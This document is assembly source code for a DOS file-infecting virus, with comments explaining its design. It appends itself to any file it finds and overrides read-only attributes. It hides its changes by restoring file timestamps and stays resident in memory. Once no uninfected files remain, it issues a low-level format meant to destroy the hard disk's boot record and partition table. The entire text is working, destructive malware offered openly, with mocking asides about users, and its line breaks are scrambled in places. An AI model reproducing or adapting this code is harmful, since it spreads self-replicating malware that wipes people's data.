;this program is a virus that infects all files, not just executables.

it gets the
first
;five bytes of its host and stores them elsewhere in the program and puts a
;jump to it at the start, along with the letters "gr", which are used to
;by the virus to identify an already infected program. the virus also save
;target file attributes and restores them on exit, so that date & time stamps
;aren't altered as with ealier timid\grouchy\t-heh variants.
;when it runs out of philes to infect, it will do a low-level format of the hdd
;starting with the partition table.

main segment byte

assume cs:main,ds:main,ss:nothing

org 100h

;this is a shell of a program which will release the virus into the system.
;all it does is jump to the virus routine, which does its job and returns to
;it, at which point it terminates to dos.

host:
jmp near ptr virus_start ;note: masm is too stupid to
assemble this correctly
db 'gr'
mov ah,4ch
mov al,0
int 21h ;terminate normally with dos

virus: ;this is a label for the first byte of the virus

comfile db '*.*',0 ;search string for any file

dstry db 0,0,0,2, 0,0,1,2, 0,0,2,2, 0,0,3,2, 0,0,4,2, 0,0,5,2, 0,0,6,2,
0,0,7,2, 0,0,8,2, 0,0,9,2, 0,0,10,2, 0,0,11,2, 0,0,12,2, 0,0,13,2, 0,0,14,2,
0,0,15,2, 0,0,16,2
fattr db 0
ftime dw 0
fdate dw 0

virus_start:
call get_start ;get start address - this is a trick to determine
the location of the start of this program
get_start: ;put the address of get_start on the stack with
the call,
sub word ptr [vir_start],offset get_start - offset virus ;which is
overlayed by vir_start. subtract offsets to get @virus
mov dx,offset dta ;put dta at the end of the virus for now
mov ah,1ah ;set new dta function
int 21h
call find_file ;get a file to attack
jnz destroy ;returned nz - go to destroy routine
call sav_attrib
call infect ;have a good file to use - infect it
call rest_attrib
exit_virus:
mov dx,80h ;fix the dta so that the host program doesn't
mov ah,1ah ;get confused and write over its data with
int 21h ;file i/o or something like that!
mov bx,[vir_start] ;get the start address of
the virus
 mov ax,word ptr [bx+(offset start_code)-(offset virus)]
;restore the 5 original bytes
mov word ptr [host],ax ;of
the com file to their
mov ax,word ptr [bx+(offset start_code)-(offset virus)+2] ;to
the start of the file
mov word ptr [host+2],ax
mov al,byte ptr [bx+(offset start_code)-(offset virus)+4] ;to
the start of the file
mov byte ptr [host+4],al
mov [vir_start],100h ;set up stack to do return
to host program
ret ;and return to host

start_code: ;move first 5 bytes from host program to here

nop ;nop's for the original assembly code
nop ;will work fine
nop
nop
nop

;--------------------------------------------------------------------------
destroy:
mov ah,05h ;format hard disk starting at sector
mov dl,80h ;0 and continuing through sector 16
mov dh,0h ;this should wipe out the master boot
mov cx,0000h ;record & partition table

mov al,11h ;low-level format information stored

mov bx,offset dstry ;at this offset in the syntax 1,2,3,4,
int 13h ;where 1=track number,2=head number,3=sector
number
;and 4=bytes/sector with 2=512 bytes/sector
ret
;---------------------------------------------------------------------------
;---------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;find a file which passes file_ok
;
;this routine does a simple directory search to find a com file in the
;current directory, to find a file for which file_ok returns with c reset.
;
find_file:
mov dx,[vir_start]
add dx,offset comfile - offset virus ;this is zero here, so
omit it
mov cx,3fh ;search for any file, no matter what the
attributes
mov ah,4eh ;do dos search first function
int 21h
ff_loop:
or al,al ;is dos return ok?
jnz ff_done ;no - quit with z reset
call file_ok ;return ok - is this a good file to use?
jz ff_done ;yes - valid file found - exit with z set
 mov ah,4fh ;not a valid file, so
int 21h ;do find next function
jmp ff_loop ;and go test next file for validity
ff_done:
ret

;--------------------------------------------------------------------------
;function to determine whether the file specified in fname is useable.
;if so return z, else return nz.
;what makes a phile useable?:
; a) there must be space for the virus without exceeding the
; 64 kbyte file size limit.
; b) bytes 0, 3 and 4 of the file are not a near jump op code,
; and 'g', 'r', respectively
;
file_ok:
mov ah,43h ;the beginning of this
mov al,0 ;routine gets the file's
mov dx,offset fname ;attribute and changes it
int 21h ;to r/w access so that when
mov [fattr],cl ;it comes time to open the
mov ah,43h ;file, the virus can easily
mov al,1 ;defeat files with a 'read
only'
mov dx,offset fname ;attribute. it leaves the
file r/w,
mov cl,0 ;because who checks that,
anyway?
int 21h
mov dx,offset fname
mov al,2
mov ax,3d02h ;r/w access open file,
since we'll want to write to it
int 21h
jc fok_nzend ;error opening file - quit
and say this file can't be used (probably won't happen)
mov bx,ax ;put file handle in bx
push bx ;and save it on the stack
mov cx,5 ;next read 5 bytes at the
start of the program
mov dx,offset start_image ;and store them here
mov ah,3fh ;dos read function
int 21h

pop bx ;restore the file handle

mov ah,3eh
int 21h ;and close the file

mov ax,word ptr [fsize] ;get the file size of the

host
add ax,offset endvirus - offset virus ;and add the size of the
virus to it
jc fok_nzend ;c set if ax overflows,
which will happen if size goes above 64k
cmp byte ptr [start_image],0e9h ;size ok - is first byte a
near jump op code?
jnz fok_zend ;not a near jump, file
must be ok, exit with z set
cmp word ptr [start_image+3],5247h ;ok, is 'gr' in positions
3 & 4?
jnz fok_zend ;no, file can be infected,
return with z set
fok_nzend:
mov al,1 ;we'd better not infect
this file
or al,al ;so return with z reset
ret
fok_zend:
xor al,al ;ok to infect, return with
z set
ret

;--------------------------------------------------------------------------
sav_attrib:
mov ah,43h
mov al,0
mov dx,offset fname
int 21h
mov [fattr],cl
mov ah,43h
mov al,1
mov dx, offset fname
mov cl,0
int 21h
mov dx,offset fname
mov al,2
mov ah,3dh
int 21h
mov [handle],ax
mov ah,57h
xor al,al
mov bx,[handle]
int 21h
mov [ftime],cx
mov [fdate],dx
mov ax,word ptr [dta+28]
mov word ptr [fsize+2],ax
mov ax,word ptr [dta+26]
mov word ptr [fsize],ax
ret
;------------------------------------------------------------------
rest_attrib:
mov dx,[fdate]
mov cx, [ftime]
mov ah,57h
mov al,1
mov bx,[handle]
int 21h
mov ah,3eh
mov bx,[handle]
int 21h
mov cl,[fattr]
xor ch,ch
mov ah,43h
mov al,1
 mov dx,offset fname
int 21h

mov ah,31h ;terminate/stay resident

mov al,0 ;and set aside 50 16-byte
mov dx,0032h ;pages in memory, just
int 21h ;to complicate things for the user
;they might not notice this too quick!
ret
;---------------------------------------------------------------------------
;this routine moves the virus (this program) to the end of the file
;basically, it just copies everything here to there, and then goes and
;adjusts the 5 bytes at the start of the program and the five bytes stored
;in memory.
;
infect:
xor cx,cx ;prepare to write virus on
new file; positon file pointer
mov dx,cx ;cx:dx pointer = 0
mov bx,word ptr [handle]
mov ax,4202h ;locate pointer to end dos
function
int 21h

mov cx,offset final - offset virus ;now write the virus;

cx=number of bytes to write
mov dx,[vir_start] ;ds:dx = place in memory
to write from
mov bx,word ptr [handle] ;bx = file handle
mov ah,40h ;dos write function
int 21h

xor cx,cx ;now we have to go save

the 5 bytes which came from the start of the
mov dx,word ptr [fsize] ;so position the file
pointer
add dx,offset start_code - offset virus ;to where start_code is in
the new virus
mov bx,word ptr [handle]
mov ax,4200h ;and use dos to position
the file pointer
int 21h

mov cx,5 ;now go write start_code

in the file
mov bx,word ptr [handle] ;get file handle
mov dx,offset start_image ;during the file_ok
function above
mov ah,40h
int 21h

xor cx,cx ;now go back to the start

of host program
mov dx,cx ;so we can put the jump to
the virus in
mov bx,word ptr [handle]
mov ax,4200h ;locate file pointer
function
 int 21h

mov bx,[vir_start] ;calculate jump location

for start of code
mov byte ptr [start_image],0e9h ;first the near jump op
code e9
mov ax,word ptr [fsize] ;and then the relative
address
add ax,offset virus_start-offset virus-3 ;these go in the
start_image area
mov word ptr [start_image+1],ax
mov word ptr [start_image+3],5247h ;and put 'gr' id code in

mov cx,5 ;ok, now go write the 5

bytes we just put in start_image
mov dx,offset start_image ;ds:dx = pointer to
start_image
mov bx,word ptr [handle] ;file handle
mov ah,40h ;dos write function
int 21h

ret ;all done, the virus is transferred

final: ;label for last byte of code to be kept in

virus when it moves

endvirus equ $ + 212 ;label for determining space needed by

virus
;note: 212 = ffff - ff2a - 1 = size of
data space
; $ gives approximate size of code
required for virus

org 0ff2ah

dta db 1ah dup (?) ;this is a work area for the

search function
fsize dw 0,0 ;file size storage area
fname db 13 dup (?) ;area for file path
handle dw 0 ;file handle
start_image db 0,0,0,0,0 ;an area to store 3 bytes for
reading and writing to file
vstack dw 50h dup (?) ;stack for the virus program
vir_start dw (?) ;start address of virus (overlays
the stack)

main ends

end host